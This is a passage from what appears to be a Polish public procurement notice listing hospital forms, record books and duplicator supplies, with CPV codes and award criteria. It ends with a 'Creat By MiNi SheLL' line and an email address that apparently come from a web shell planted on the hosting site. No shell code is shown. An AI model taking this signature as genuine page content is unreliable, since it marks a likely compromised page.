Druk orzeczenie lekarskie kopiujacy		A5 wielokopia (oryginał i 2 kopie)	bl	100
Druk Rozchód Wewnętrzny Bank Krwi kopijący		 A4  wielokopia (oryginał i 2 kopie)	bl	35
Druk zaświadczenia  dla celów sanitarno-epoidemiologicznych 		wielokopjujące  jeden raz	szt	5
Druk zaświadczenie lekarskie		wielokopia A5 bloczek a 100	szt	50
Druk zaświadczenie lekarskie  dla kierowców wielokopjujące 2 razy		A5 wielokopia (oryginał i 2 kopie)	bl	5
Druk zaświadczenie lekarskie dla uczniów i studentów 		A5 wielokopia (oryginał i 1 kopia)	bl	5
Książka dokumentacyjna do prób zgodności 100kart.		 	szt	2
Książka kontroli środków odurzających i psychotropowych		A 4 twarda oprawa szyta
 na krótkiej  krawędzi 2 stronny	szt	5
Książka korespodencyjna 			szt	5
Książka raport pielęgniarski		A 4 twarda oprawa szyta
 na długiej krawędzi 2 stronny	szt	140
Książka rejestr pacjentów		A4 oprawa twarda szyta na krótkim boku 	szt	20
Książka urodzeń noworodków		2/3 A3 okładka twarda szyta na krótszym boku rozkład kolumn na 2 stronach 	szt	3
Książki pocztowe nadawcze			szt	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materiały eksploatacyjne do duplikatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Farba do duplikatora	op=10 szt	do duplikatora Duplo DPA-100	op	10
Matryca do risografu	op=2 szt	do powielacza Duplo DPA-100	op	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com